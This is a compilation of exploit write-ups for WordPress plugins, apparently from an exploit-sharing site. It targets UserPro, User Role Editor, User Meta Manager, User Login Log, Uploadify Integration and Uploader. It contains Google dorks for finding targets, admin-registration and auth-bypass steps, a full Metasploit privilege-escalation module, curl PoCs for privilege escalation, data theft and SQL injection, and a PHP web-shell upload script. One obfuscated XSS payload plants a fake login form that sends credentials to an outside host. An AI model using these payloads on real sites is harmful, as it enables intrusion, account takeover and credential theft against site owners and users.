    https://domain.tld/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=<PAYLOAD>
HireHackking 
# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role
# Google Dork: inurl:/wp-content/plugins/userpro/
# Date: 3rd January, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage: https://userproplugin.com/
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: < 4.9.21
# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well

UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21
But there wasn't any POC available so this exploit demonstrates this
vulnerability.
https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt
From the changelog: "Security Fix : Registration role validation fix"

The latest version up to now is 4.9.29
The vulnerability allows anyone to register with Administrator role which
can easily be turned into RCE

Steps to reproduce:

1. Go to the registration form, input random fake values, trigger Burp
Suite and click submit.

2. The POST data will look similar to following

redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701=
USERNAME@EMAIL.COM
&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx

Here "-701" is a random postfix number and gets stripped at the server.
Other than that, the interesting values are

user_login
user_email
user_pass
user_pass_confirm

3. Adding following extra parameter in POST data will register the user
with Administrator privileges

role-701=administrator

So the modified POST data will look similar to following

role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip....

4. Forward the POST data in Burp Suite and you will get redirect to
/profile/ page with Administrator menu on top. Access /wp-admin/ to get to
the dashboard

5. Upload shell with default methods

@nomanriffat
HireHackking 
# Exploit Title: Userpro – WordPress Plugin – Authentication Bypass
# Google Dork: inurl:/plugins/userpro
# Date: 11.04.2017
# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)
# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9
# Version: <= 4.6.17
# Tested on: Wordpress 4.8.3
# CVE : requested, not assigned yet.

Description
================================================================================
 The userpro plugin has the ability to bypass login authentication for the user
 'admin'. If the site does not use the standard username 'admin' it is not affected.
   
PoC
================================================================================
1 - Google Dork inurl:/plugins/userpro

2 - Browse to a site that has the userpro plugin installed.

3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true

4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in
will full administrator access.
================================================================================

10/25/2017 – Wordfence notified of issue by Iain Hadgraft.
10/26/2017 – Vendor resolved the issue in the plugin.
11/04/2017 - Disclosure.
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress User Role Editor Plugin Privilege Escalation',
      'Description'     => %q{
        The WordPress User Role Editor plugin prior to v4.25, is lacking an authorization
        check within its update user profile functionality ("update" function, contained
        within the "class-user-other-roles.php" module).
        Instead of verifying whether the current user has the right to edit other users'
        profiles ("edit_users" WP capability), the vulnerable function verifies whether the
        current user has the rights to edit the user ("edit_user" WP function) specified by
        the supplied user id ("user_id" variable/HTTP POST parameter). Since the supplied
        user id is the current user's id, this check is always bypassed (i.e. the current
        user is always allowed to modify its profile).
        This vulnerability allows an authenticated user to add arbitrary User Role Editor
        roles to its profile, by specifying them via the "ure_other_roles" parameter within
        the HTTP POST request to the "profile.php" module (issued when "Update Profile" is
        clicked).
        By default, this module grants the specified WP user all administrative privileges,
        existing within the context of the User Role Editor plugin.
      },
      'Author'          =>
        [
          'ethicalhack3r',    # Vulnerability discovery
          'Tomislav Paskalev' # Exploit development, metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          ['WPVDB', '8432'],
          ['URL', 'https://www.wordfence.com/blog/2016/04/user-role-editor-vulnerability/']
	],
      'DisclosureDate'  => 'Apr 05 2016',
    ))

    register_options(
      [
        OptString.new('TARGETURI',   [true, 'URI path to WordPress', '/']),
        OptString.new('ADMINPATH',   [true, 'wp-admin directory', 'wp-admin/']),
        OptString.new('CONTENTPATH', [true, 'wp-content directory', 'wp-content/']),
        OptString.new('PLUGINSPATH', [true, 'wp plugins directory', 'plugins/']),
        OptString.new('PLUGINPATH',  [true, 'User Role Editor directory', 'user-role-editor/']),
        OptString.new('USERNAME',    [true, 'WordPress username']),
        OptString.new('PASSWORD',    [true, 'WordPress password']),
	OptString.new('PRIVILEGES',  [true, 'Desired User Role Editor privileges', 'activate_plugins,delete_others_pages,delete_others_posts,delete_pages,delete_posts,delete_private_pages,delete_private_posts,delete_published_pages,delete_published_posts,edit_dashboard,edit_others_pages,edit_others_posts,edit_pages,edit_posts,edit_private_pages,edit_private_posts,edit_published_pages,edit_published_posts,edit_theme_options,export,import,list_users,manage_categories,manage_links,manage_options,moderate_comments,promote_users,publish_pages,publish_posts,read_private_pages,read_private_posts,read,remove_users,switch_themes,upload_files,customize,delete_site,create_users,delete_plugins,delete_themes,delete_users,edit_plugins,edit_themes,edit_users,install_plugins,install_themes,unfiltered_html,unfiltered_upload,update_core,update_plugins,update_themes,ure_create_capabilities,ure_create_roles,ure_delete_capabilities,ure_delete_roles,ure_edit_roles,ure_manage_options,ure_reset_roles'])
      ])
  end

  # Detect the vulnerable plugin by enumerating its readme.txt file
  def check
    readmes = ['readme.txt', 'Readme.txt', 'README.txt']

    res = nil
    readmes.each do |readme_name|
      readme_url = normalize_uri(target_uri.path, datastore['CONTENTPATH'], datastore['PLUGINSPATH'], datastore['PLUGINPATH'], readme_name)
      vprint_status("Checking #{readme_url}")
      res = send_request_cgi(
        'uri'    => readme_url,
        'method' => 'GET'
      )
      break if res && res.code == 200
    end

    if res.nil? || res.code != 200
      # The readme.txt file does not exist
      return Msf::Exploit::CheckCode::Unknown
    end

    version_res = extract_and_check_version(res.body.to_s, :readme, 'plugin', '4.25', nil)
    return version_res
  end

  def username
    datastore['USERNAME']
  end

  def password
    datastore['PASSWORD']
  end

  # Search for specified data within the provided HTTP response
  def check_response(res, name, regex)
    res.body =~ regex
    result = $1
    if result
      print_good("#{peer} - WordPress - Getting data   - #{name}")
    else
      vprint_error("#{peer} #{res.body}")
      fail_with("#{peer} - WordPress - Getting data   - Failed (#{name})")
    end
    return result
  end

  # Run the exploit
  def run
    # Check if the specified target is running WordPress
    fail_with("#{peer} - WordPress - Not Found") unless wordpress_and_online?

    # Authenticate to WordPress
    print_status("#{peer} - WordPress - Authentication - #{username}:#{password}")
    cookie = wordpress_login(username, password)
    fail_with("#{peer} - WordPress - Authentication - Failed") if cookie.nil?
    store_valid_credential(user: username, private: password, proof: cookie)
    print_good("#{peer} - WordPress - Authentication - OK")

    # Get additional information from WordPress, required for the HTTP POST request (anti-CSRF tokens, user parameters)
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - WordPress - Getting data   - #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })

    if res and res.code == 200
      wp_nonce     = check_response(res, "_wpnonce",     /name=\"_wpnonce\" value=\"(.+?(?=\"))\"/)
      color_nonce  = check_response(res, "color-nonce",  /name=\"color-nonce\" value=\"(.+?(?=\"))\"/)
      checkuser_id = check_response(res, "checkuser_id", /name=\"checkuser_id\" value=\"(.+?(?=\"))\"/)
      nickname     = check_response(res, "nickname",     /name=\"nickname\" id=\"nickname\" value=\"(.+?(?=\"))\"/)
      display_name = check_response(res, "display_name", /name=\"display_name\" id=\"display_name\"\>[\s]+\<option  selected=\'selected\'\>(.+?(?=\<))\</)
      email        = check_response(res, "email",        /name=\"email\" id=\"email\" value=\"(.+?(?=\"))\"/)
      user_id      = check_response(res, "user_id",      /name=\"user_id\" id=\"user_id\" value=\"(.+?(?=\"))\"/)
    else
      fail_with("#{peer} - WordPress - Getting data   - Server response (code #{res.code})")
    end
 
    # Send HTTP POST request - update the specified user's privileges
    print_status("#{peer} - WordPress - Changing privs - #{username}")
    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => url,
      'vars_post' => {
        '_wpnonce'         => wp_nonce,
        '_wp_http_referer' => URI::encode(url),
        'from'             => 'profile',
        'checkuser_id'     => checkuser_id,
        'color-nonce'      => color_nonce,
        'admin_color'      => 'fresh',
        'admin_bar_front'  => '1',
        'first_name'       => '',
        'last_name'        => '',
        'nickname'         => nickname,
        'display_name'     => display_name,
        'email'            => email,
        'url'              => '',
        'description'      => '',
        'pass1'            => '',
        'pass2'            => '',
        'ure_other_roles'  => datastore['PRIVILEGES'],
        'action'           => 'update',
        'user_id'          => user_id,
        'submit'           => 'Update+Profile'
      },
      'cookie'    => cookie
    })

    # check outcome
    if res and res.code == 302
      print_good("#{peer} - WordPress - Changing privs - OK")
    else
      fail_with("#{peer} - WordPress - Changing privs - Server response (code #{res.code})")
    end
  end
end

# EoF
HireHackking 
* Exploit Title: WordPress User Meta Manager Plugin [Privilege Escalation]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
================================================================================

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a privilege 
escalation vulnerability. A registered user can modify the meta information of 
any registered user, including himself. This way he can modify `wp_capabilities`
meta to escalate his account to a full privileged administrative account.

PoC
================================================================================


curl -c ${USER_COOKIES} \
     -d "mode=edit&umm_meta_value[]=a:1:{s:13:\"administrator\";b:1;}\
     &umm_meta_key[]=wp_capabilities" \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=umm_update_user_meta&umm_user=${USER_ID}"


Timeline
================================================================================

2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7

Solution
================================================================================
  
No official solution yet exists.
HireHackking 
* Exploit Title: WordPress User Meta Manager Plugin [Information Disclosure]
* Discovery Date: 2015-12-28
* Public Disclosure Date: 2016-02-01
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4
* Category: webapps

## Description

User Meta Manager for WordPress plugin up to v3.4.6 suffers from a information disclosure vulnerability. Any registered user can perform an a series of AJAX 
requests, in order to get all contents of `usermeta` DB table. 

`usermeta` table holds additional information for all registered users. User Meta Manager plugin offers a `usermeta` table backup functionality. During the backup process the plugin takes no action in protecting the leakage of the table contents to unauthorized (non-admin) users.

## PoC

### Get as MySQL query

First a backup table must be created

 
curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_backup"


Then we get the table with another request

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_backup&mode=sql"

### Get as CSV file

curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\
    ?action=umm_switch_action&umm_sub_action=umm_get_csv"

## Solution

Upgrade to version 3.4.8
HireHackking 
* Exploit Title: WordPress User Meta Manager Plugin [Blind SQLI]
* Discovery Date: 2015/12/28
* Public Disclosure Date: 2016/02/04
* Exploit Author: Panagiotis Vagenas
* Contact: https://twitter.com/panVagenas
* Vendor Homepage: http://jasonlau.biz/home/
* Software Link: https://wordpress.org/plugins/user-meta-manager/
* Version: 3.4.6
* Tested on: WordPress 4.4.1
* Category: webapps

Description
================================================================================

AJAX actions `umm_edit_user_meta` and `umm_delete_user_meta` of the User Meta 
Manager for WordPress plugin up to v3.4.6 are vulnerable to blind SQL injection
attacks. A registered user can pass arbitrary MySQL commands to `umm_user` GET 
param.

PoC
================================================================================


curl -c ${USER_COOKIES} \
    "http://${VULN_SITE}/wp-admin/admin-ajax.php\?action=umm_switch_action\
    &umm_sub_action=[umm_delete_user_meta|umm_edit_user_meta]&umm_user=SLEEP(5)"


Timeline
================================================================================

2015/12/28 - Discovered
2015/12/29 - Vendor notified via support forums in WordPress.org
2015/12/29 - Vendor notified via contact form in his site
2016/01/29 - WordPress security team notified about the issue
2016/02/02 - Vendor released version 3.4.7
2016/02/02 - Verified that this exploit no longer applies in version 3.4.7

Solution
================================================================================
  
Update to version 3.4.7
HireHackking 
Source: https://sumofpwn.nl/advisory/2016/stored_cross_site_scripting_vulnerability_in_user_login_log_wordpress_plugin.html

Abstract
A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.

Contact
For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage
This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID
OVE-20160724-0011

Tested versions
This issue was successfully tested on User Login Log WordPress Plugin version 2.2.1.

Fix
There is currently no fix available.

Introduction
The User Login Log WordPress Plugin track records of WordPress user login with set of multiple information like ip, date , time, country , city, and user name. A stored Cross-Site Scripting vulnerability was found in the User Login Log WordPress Plugin. This issue can be exploited by Subscriber (or higher) and allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf.

Details
This vulnerability exists due to the lack of encoding of the User-Agent HTTP request header. This issue exists in method column_default() that is implemented in the file user-login-log.php.

function column_default($item, $column_name)
{
   
[...]
   
   switch($column_name){
   
[...]
      
   default:
      return $item[$column_name];
   }
}
Proof of concept:

POST /wp-login.php HTTP/1.1
Host: <target>
User-Agent: XSS<script>document.getElementById(/wpwrap/.toString().substring(1, 7)).innerHTML = String.fromCharCode(60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,99,111,108,111,114,115,45,102,114,101,115,104,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,99,111,108,111,114,115,45,102,114,101,115,104,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,60,108,105,110,107,32,114,101,108,61,39,115,116,121,108,101,115,104,101,101,116,39,32,105,100,61,39,108,111,103,105,110,45,99,115,115,39,32,104,114,101,102,61,39,99,115,115,47,108,111,103,105,110,46,99,115,115,39,32,116,121,112,101,61,39,116,101,120,116,47,99,115,115,39,32,109,101,100,105,97,61,39,97,108,108,39,47,62,32,60,115,116,121,108,101,62,98,111,100,121,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,104,101,97,100,101,114,123,98,97,99,107,103,114,111,117,110,100,58,32,110,111,110,101,59,125,35,108,111,103,105,110,102,111,114,109,123,116,101,120,116,45,97,108,105,103,110,58,32,108,101,102,116,59,125,112,32,35,110,97,118,123,116,101,120,116,45,115,104,97,100,111,119,58,32,114,103,98,97,40,50,53,53,44,50,53,53,44,50,53,53,44,49,41,32,48,32,49,112,120,32,48,59,125,46,115,117,98,109,105,116,123,112,97,100,100,105,110,103,58,32,48,59,125,35,98,97,99,107,116,111,98,108,111,103,32,97,123,99,111,108,111,114,58,32,35,99,99,99,59,125,60,47,115,116,121,108,101,62,32,60,100,105,118,32,105,100,61,34,108,111,103,105,110,34,62,60,104,49,62,60,97,32,104,114,101,102,61,34,104,116,116,112,58,47,47,119,111,114,100,112,114,101,115,115,46,111,114,103,47,34,32,116,105,116,108,101,61,34,80,111,119,101,114,101,100,32,98,121,32,87,111,114,100,80,114,101,115,115,34,62,84,111,116,97,108,108,121,32,76,101,103,105,116,32,76,111,103,105,110,32,70,111,114,109,60,47,97,62,60,47,104,49,62,32,60,102,111,114,109,32,110,97,109,101,61,34,108,111,103,105,110,102,111,114,109,34,32,105,100,61,34,108,111,103,105,110,102,111,114,109,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,115,104,111,97,108,111,97,107,46,109,108,47,99,111,108,108,101,99,116,34,32,109,101,116,104,111,100,61,34,80,79,83,84,34,32,116,97,114,103,101,116,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,112,62,60,108,97,98,101,108,62,85,115,101,114,110,97,109,101,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,116,101,120,116,34,32,110,97,109,101,61,34,117,34,32,105,100,61,34,117,115,101,114,95,108,111,103,105,110,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,49,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,62,60,108,97,98,101,108,62,80,97,115,115,119,111,114,100,60,98,114,47,62,60,105,110,112,117,116,32,116,121,112,101,61,34,112,97,115,115,119,111,114,100,34,32,110,97,109,101,61,34,112,34,32,105,100,61,34,117,115,101,114,95,112,97,115,115,34,32,99,108,97,115,115,61,34,105,110,112,117,116,34,32,118,97,108,117,101,61,34,34,32,115,105,122,101,61,34,50,48,34,32,116,97,98,105,110,100,101,120,61,34,50,48,34,47,62,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,115,116,121,108,101,61,34,99,111,108,111,114,58,114,101,100,34,62,83,101,115,115,105,111,110,32,104,97,115,32,101,120,112,105,114,101,100,44,32,112,108,101,97,115,101,32,108,111,103,32,105,110,60,47,112,62,60,112,32,99,108,97,115,115,61,34,102,111,114,103,101,116,109,101,110,111,116,34,62,60,108,97,98,101,108,62,60,105,110,112,117,116,32,110,97,109,101,61,34,114,101,109,101,109,98,101,114,109,101,34,32,116,121,112,101,61,34,99,104,101,99,107,98,111,120,34,32,105,100,61,34,114,101,109,101,109,98,101,114,109,101,34,32,118,97,108,117,101,61,34,102,111,114,101,118,101,114,34,32,116,97,98,105,110,100,101,120,61,34,57,48,34,47,62,32,82,101,109,101,109,98,101,114,32,77,101,60,47,108,97,98,101,108,62,60,47,112,62,60,112,32,99,108,97,115,115,61,34,115,117,98,109,105,116,34,62,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61,34,119,112,45,115,117,98,109,105,116,34,32,105,100,61,34,119,112,45,115,117,98,109,105,116,34,32,118,97,108,117,101,61,34,76,111,103,32,73,110,34,32,116,97,98,105,110,100,101,120,61,34,49,48,48,34,47,62,60,47,112,62,60,47,102,111,114,109,62,32,60,112,32,105,100,61,34,110,97,118,34,62,60,97,32,104,114,101,102,61,34,46,46,47,119,112,45,108,111,103,105,110,46,112,104,112,63,97,99,116,105,111,110,61,108,111,115,116,112,97,115,115,119,111,114,100,34,32,116,105,116,108,101,61,34,80,97,115,115,119,111,114,100,32,76,111,115,116,32,97,110,100,32,70,111,117,110,100,34,62,76,111,115,116,32,121,111,117,114,32,112,97,115,115,119,111,114,100,63,60,47,97,62,60,47,112,62,60,47,100,105,118,62,60,105,102,114,97,109,101,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,32,110,97,109,101,61,34,104,105,100,100,101,110,45,102,111,114,109,34,62,60,47,105,102,114,97,109,101,62,32,60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,116,114,121,123,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,117,115,101,114,95,108,111,103,105,110,39,41,46,102,111,99,117,115,40,41,59,125,99,97,116,99,104,40,101,41,123,125,60,47,115,99,114,105,112,116,62);document.getElementById(/wpwrap/.toString().substring(1, 7)).id = /login/.toString().substring(1, 5);document.cookie = String.fromCharCode(39,118,105,115,105,116,101,100,61,116,114,117,101,59,112,97,116,104,61,47,59,109,97,120,45,97,103,101,61,39) + 60 * 10;
</script>XSS
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.8
Accept-Encoding: gzip,deflate,lzma,sdch
Cookie: wordpress_test_cookie=WP+Cookie+check
Connection: close
Content-Type: application/x-www-form-urlencoded
   
log=<user name>&pwd=<password>&wp-submit=Log+In&redirect_to=%2Fwp-admin%2F&testcookie=1
HireHackking 
source: https://www.securityfocus.com/bid/52944/info

Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected. 

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
HireHackking 
source: https://www.securityfocus.com/bid/57112/info

The Uploader plugin for WordPress is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.

Uploader 1.0.4 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$uploadfile="lo.php";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/uploader/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/wordpress/wp-content/uploads",
'fileext'=>'php'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Shell Access :
http://www.example.com/wordpress/wp-content/uploads/lo.php

lo.php
<?php
phpinfo();
?>
HireHackking 
source: https://www.securityfocus.com/bid/58285/info

The Uploader Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Uploader 1.0.4 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3Cscript%3Ealert%28123%29;%3C/script%3E